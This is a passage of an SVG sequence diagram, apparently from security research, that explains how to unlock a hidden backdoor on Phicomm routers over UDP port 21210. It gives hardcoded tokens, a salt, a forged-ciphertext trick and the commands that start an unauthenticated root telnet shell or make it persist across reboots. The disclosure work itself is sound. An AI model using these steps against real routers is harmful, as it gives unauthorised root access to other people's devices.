0A%0A%0A%0A%0A%0AServer-%3EServer%3ACreate%20two%20new%20strings%20by%20calling%5Cn**sprintf(**%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%20and%5Cn**sprintf(**%3Ccolor%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%5Cnrespectively.%20%5Cn%5Cn%3Ccolor%3A%23red%3E**Note%20that%20if%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**MASKED_SECRET**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20begins%20with%20a%20null%20byte%2C%5Cnthen%20the%20strings%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**RAW_TEMP_KEY**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20and%20%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**RAW_PERM_KEY**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20will%5Cnjust%20be%20%3C%2Fcolor%3E%3Ccolor%3A%23darkred%3E%22%2BTEMP%22%3C%2Fcolor%3E%20%3Ccolor%3A%23red%3Eand%3C%2Fcolor%3E%20%3Ccolor%3A%23darkred%3E%22%2BPERM%22%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2C%20respectively!%0A%0Aactivate%20Server%20%23yellow%0A%0AServer-%3EServer%3ACompute%20the%20**MD5**%20hashes%20of%20%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%5Cnand%20store%20the%2016-byte%20results%20as%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%2C%5Cnrespectively.%0A%0AClient--%3EClient%3A%20The%20Client%20is%20now%20expected%20to%20append%20one%20of%20two%5Cnsuffixes%20to%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%3A%5Cn%5Cn-%20%22%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20to%20launch%20a%20**telnetd**%20session%20that%20will%5Cn%20%20%20last%20until%20the%20router%20is%20rebooted%2C%20%2F%2For%2F%2F%5Cn-%20%20%22%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20to%20write%20a%20flag%20to%20a%20physical%20volume%2C%5Cn%20%20%20which%20the%20**telnetd_startup**%20daemon%20will%20check%20for%5Cn%20%20%20when%20the%20system%20is%20rebooted%2C%20and%20launch%20**telnetd**%5Cn%20%20%20if%20it%20finds%20it.%5Cn%5Cn%3Ccolor%3A%23red%3E**Remember%20that%20we%20have%20effectively%20set%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**xor(XOR_MASK,SECRET_PLAINTEXT)**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20to%5Cnthe%20empty%20string%2C%20so%20the%20suffix%20is%20all%20we%20need%20to%5Cnknow.%3C%2Fcolor%3E**%5Cn%5CnStore%20the%20result%20in%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E.%0A%0Aactivate%20Client%20%23yellow%0A%0AClient--%3EClient%3A%20Compute%20the%20**MD5**%20hash%20of%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E%2C%20and%20store%5Cnthe%20result%20in%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E.%5Cn%5Cn%3Ccolor%3A%23red%3E**Here%2C%20all%20we%20need%20to%20do%20is%20compute%20the%20MD5%5Cnhash%20of%20%3Ccolor%3A%23darkred%3E%2BTEMP%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20or%20%3Ccolor%3A%23darkred%3E%2BPERM%3C%2Fcolor%3E%0A%0Aactivate%20Client%20%23red%0A%0AClient--%3EServer%3A%20Send%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20to%20Server%0A%0Aactivate%20Server%20%23red%0A%0AServer--%3EServer%3A%20**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Etelnetd%20-l%20%2Fbin%2Flogin.sh%3C%2Fcolor%3E%22)**%2C%5Cnlaunching%20an%20unencrypted%20**telnetd**%20shell%5Cnas%20**root**.%20No%20credentials%20are%20required%20to%5Cnlog%20into%20this%20shell.%5Cn%5Cn**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Eiwpriv%20ra0%20e2p%2026%3D7010%3C%2Fcolor%3E%22)**%2C%5Cnwriting%20the%20bytes%20%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E7010%3C%2Fcolor%3E%5D%20to%20**EEPROM**%2C%5Cnat%20offset%20%3Ccolor%3A%23darkgreen%3E0x26%3C%2Fcolor%3E%20(virtual%20address%20%3Ccolor%3A%23darkgreen%3E0x40026%3C%2Fcolor%3E).%20This%5Cncode%20will%20instruct%20the%20**telnetd_startup**%20daemon%5Cnto%20launch%20**telnetd%20-l%20%2Fbin%2Flogin.sh**%20on%20boot.%0A</desc><defs/><g><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g><rect fill="white" stroke="none" x="0" y="0" width="1672" height="3333"/></g><g><text fill="black" stroke="none" font-family="sans-serif" font-size="22.5pt" font-style="normal" font-weight="normal" text-decoration="normal" x="297.366151838796" y="32.04212955" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Picking the Lock on Phicomm's Encrypted Backdoor, on UDP Port 21210</text></g><g/><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 62.80785098743945 125.39153363899999 L 62.80785098743945 3333.8767725790003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="16.431861307692305,7.120473233333333"/><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 125.39153363899999 L 905.7354112766808 3333.8767725790003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="16.431861307692305,7.120473233333333"/></g><g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 10.68070985 67.715700449 L 114.9349921248789 67.715700449 L 114.9349921248789 125.39153363899999 L 10.68070985 125.39153363899999 L 10.68070985 67.715700449 Z" stroke-miterlimit="10" stroke-width="3.417827152" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="33.8578502245" y="104.03011393899999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Client</text></g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 849.7749380774737 67.715700449 L 961.6958844758879 67.715700449 L 961.6958844758879 125.39153363899999 L 849.7749380774737 125.39153363899999 L 849.7749380774737 67.715700449 Z" stroke-miterlimit="10" stroke-width="3.417827152" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="872.9520784519738" y="104.03011393899999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Server</text></g></g><g><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 52.12714113743945 136.072243489 L 73.48856083743945 136.072243489 L 73.48856083743945 3312.515352879 L 52.12714113743945 3312.515352879 L 52.12714113743945 136.072243489" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 895.0547014266808 238.607058049 L 916.4161211266808 238.607058049 L 916.4161211266808 3312.515352879 L 895.0547014266808 3312.515352879 L 895.0547014266808 238.607058049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 411.634557619 L 927.0968309766807 411.634557619 L 927.0968309766807 514.169372179 L 905.7354112766808 514.169372179 L 905.7354112766808 411.634557619" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 62.80785098743945 1093.063846049 L 84.16927068743945 1093.063846049 L 84.16927068743945 3312.515352879 L 62.80785098743945 3312.515352879 L 62.80785098743945 1093.063846049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 1261.819061679 L 927.0968309766807 1261.819061679 L 927.0968309766807 3312.515352879 L 905.7354112766808 3312.515352879 L 905.7354112766808 1261.819061679" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 916.4161211266809 1392.123721849 L 937.7775408266808 1392.123721849 L 937.7775408266808 3312.515352879 L 916.4161211266809 3312.515352879 L 916.4161211266809 1392.123721849" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 927.0968309766808 1565.151221419 L 948.4582506766808 1565.151221419 L 948.4582506766808 3312.515352879 L 927.0968309766808 3312.515352879 L 927.0968309766808 1565.151221419" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 73.48856083743945 1624.963196579 L 94.84998053743945 1624.963196579 L 94.84998053743945 3312.515352879 L 73.48856083743945 3312.515352879 L 73.48856083743945 1624.963196579" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 84.16927068743945 1949.656776019 L 105.53069038743945 1949.656776019 L 105.53069038743945 3312.515352879 L 84.16927068743945 3312.515352879 L 84.16927068743945 1949.656776019" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 937.7775408266808 2186.7685346890003 L 959.1389605266808 2186.7685346890003 L 959.1389605266808 3312.515352879 L 937.7775408266808 3312.515352879 L 937.7775408266808 2186.7685346890003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 94.84998053743945 2703.714891429 L 116.21140023743945 2703.714891429 L 116.21140023743945 3312.515352879 L 94.84998053743945 3312.515352879 L 94.84998053743945 2703.714891429" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 105.53069038743945 2876.7423909990002 L 126.89211008743945 2876.7423909990002 L 126.89211008743945 3312.515352879 L 105.53069038743945 3312.515352879 L 105.53069038743945 2876.7423909990002" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 948.4582506766808 2936.5543661590004 L 969.8196703766807 2936.5543661590004 L 969.8196703766807 3312.515352879 L 948.4582506766808 3312.515352879 L 948.4582506766808 2936.5543661590004" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g><g><rect fill="white" stroke="none" x="318.8757539581576" y="168.114373039" width="314.4250913686792" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="318.8757539581576" y="189.47579273899998" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="318.8757539581576" y="210.83721243899998" width="330.7917543478052" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.0799669131576" y="187.33965076899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send the token "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="489.47996080964197" y="187.33965076899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ABCDEF1234</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="620.8966325625717" y="187.33965076899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.0799669131576" y="208.70107046899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.0799669131576" y="230.06249016899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="384.3299669131576" y="230.06249016899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">41424344454631323334</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="638.6632951602279" y="230.06249016899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 73.48856083743945 238.607058049 L 877.4671325403475 238.607058049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(895.0547014266808,238.607058049) translate(-895.0547014266808,-238.607058049)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 877.2535183433475 229.70646650733332 L 895.0547014266808 238.607058049 L 877.2535183433475 247.50764959066666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="952.3745109550141" y="270.649187599" width="388.8084198064844" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="292.010607299" width="437.85842571926514" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="313.372026999" width="346.8751007146875" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="334.733446699" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="356.094866399" width="474.5250946111719" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="289.87446532900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">compute MD5 hash of 128-byte buffer</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="311.23588502900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">beginning with "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1119.4620552088422" y="311.23588502900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">K2_COSTDOWN__VER_3.0</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1377.828723910014" y="311.23588502900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="332.59730472900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">with the rest of the bytes left null.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="353.95872442900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="375.320144129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1145.9287300135297" y="375.320144129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 916.4161211266808 383.864712009 L 1012.5425097766808 383.864712009 L 1012.5425097766808 411.634557619 L 944.6843998630142 411.634557619" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(927.0968309766808,411.634557619) translate(-927.0968309766808,-411.634557619)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 944.8980140600141 402.7339660773334 L 927.0968309766808 411.634557619 L 944.8980140600141 420.53514916066666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="245.49111040903642" y="443.676687169" width="440.225085360531" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="245.49111040903642" y="465.038106869" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="245.49111040903642" y="486.399526569" width="488.24175129604737" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="248.69532336403643" y="462.901964899" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Reply with the </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="398.3953203122786" y="462.901964899" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="676.1619829099349" y="462.901964899" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="248.69532336403643" y="484.263384599" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="248.69532336403643" y="505.624804299" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="310.9453233640364" y="505.624804299" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">812B50867EFB281491D8F9285D007914</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="722.7286485593489" y="505.624804299" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 514.169372179 L 91.0761297237728 514.169372179" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(73.48856083743945,514.169372179) translate(-73.48856083743945,-514.169372179)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 91.28974392077279 505.26878063733335 L 73.48856083743945 514.169372179 L 91.28974392077279 523.0699637206667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="109.44695066577279" y="546.211501729" width="516.5750976629297" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="567.572921429" width="580.408419711117" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="588.9343411289999" width="323.79175720882813" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="610.2957608289998" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="631.6571805289998" width="304.6251007146875" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="653.0186002289997" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="674.3800199289997" width="560.3917633123438" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="695.7414396289996" width="535.7917572088281" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="717.1028593289996" width="512.1417633123438" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="738.4642790289995" width="67.85842667293946" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="759.8256987289994" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="781.1871184289994" width="502.4917694158594" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="802.5485381289993" width="556.4250885076563" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="823.9099578289993" width="162.65841971111695" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="845.2713775289992" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="866.6327972289992" width="653.0250640935938" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="887.9942169289991" width="630.375093085293" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="909.355636628999" width="605.3584152288477" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="930.717056328999" width="641.5584312505762" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="952.0784760289989" width="729.9917541570703" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="973.4398957289989" width="735.4084144659082" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="994.8013154289988" width="505.39176331234376" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="1016.1627351289987" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="1037.5241548289987" width="581.8917723722498" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="565.436779459" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Produce a 32-byte-long message called </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="514.0011697242884" y="565.436779459" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="586.798199159" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">that the Server will decrypt with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="441.8178201149134" y="586.798199159" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="680.3011575172571" y="586.798199159" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="608.1596188589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded public key.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="629.5210385589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="650.8824582589998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Two things are essential here:</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="672.2438779589997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="693.6052976589997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">(1) the fate of this message is to be decrypted with the</text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="112.65116362077279" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">HARDCODED PUBLIC KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="394.0011697242884" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and then </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="496.2011666725306" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="543.3011651466517" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ed with a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="736.3281370589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">randomly generated secret text 31 ASCII-printable</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="757.6895567589995" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">bytes.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="779.0509764589995" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="800.4123961589994" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">(2) the result of these two operations will then be</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="821.7738158589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">concatenated with the salt </text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="386.48450712663214" y="821.7738158589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using sprintf and the %s</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="112.65116362077279" y="843.1352355589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">format string</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="262.55115751725714" y="843.1352355589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="864.4966552589992" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="885.8580749589992" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If we can discover a phony ciphertext that, when decrypted with</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="112.65116362077279" y="907.2194946589991" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypy()</text><text 